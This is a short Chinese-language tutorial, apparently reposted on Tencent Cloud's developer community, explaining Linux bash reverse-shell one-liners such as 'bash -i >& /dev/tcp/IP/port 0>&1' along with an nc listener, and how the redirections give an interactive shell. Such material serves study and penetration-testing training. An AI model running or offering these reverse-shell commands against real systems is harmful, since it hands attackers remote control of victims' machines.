前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Linux反弹shell

Linux反弹shell

原创
作者头像
vFREE
发布2021-12-19 18:35:54
10.3K0
发布2021-12-19 18:35:54
举报

文章源自于个人博客:http://vfree.ltd

1.bash

1.1first

bash -i > /dev/tcp/ipaddr/port 

bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的IP地址 2345:反弹到的端口

上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到

攻击机使用 nc -lvp 2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令

1.2second

bash -i >& /dev/tcp/127.0.0.1/2345 0>&1

这种就是交互式shell了

  • &:标准错误输出重定向输出
  • 0>&1:简单一点理解就是将我们在攻击机输入的命令当成靶机输入,然后靶机返回内容时又重定向攻击机,也就是交互界面,打开了一个shell窗口,随意可以在攻击机执行命令,然后在攻击机输出结果,这么一个意思

0:标准输入 1:标准输出 2:标准错误输出 &:是为了区分标准输出和文件描述符1

1.3third

bash -i > /dev/tcp/127.0.0.1/2345 0>&1 2>&1

和上面的效果一样

1.4fourth

bash -i >& /dev/tcp/127.0.0.1/2345 0>&1

值得一提的是,">&"相当于"2>&1",标准错误输出

一个标准的反弹shell语句种,最好是有标准输入输出和标准输出

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.bash
    • 1.1first
      • 1.2second
        • 1.3third
          • 1.4fourth
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档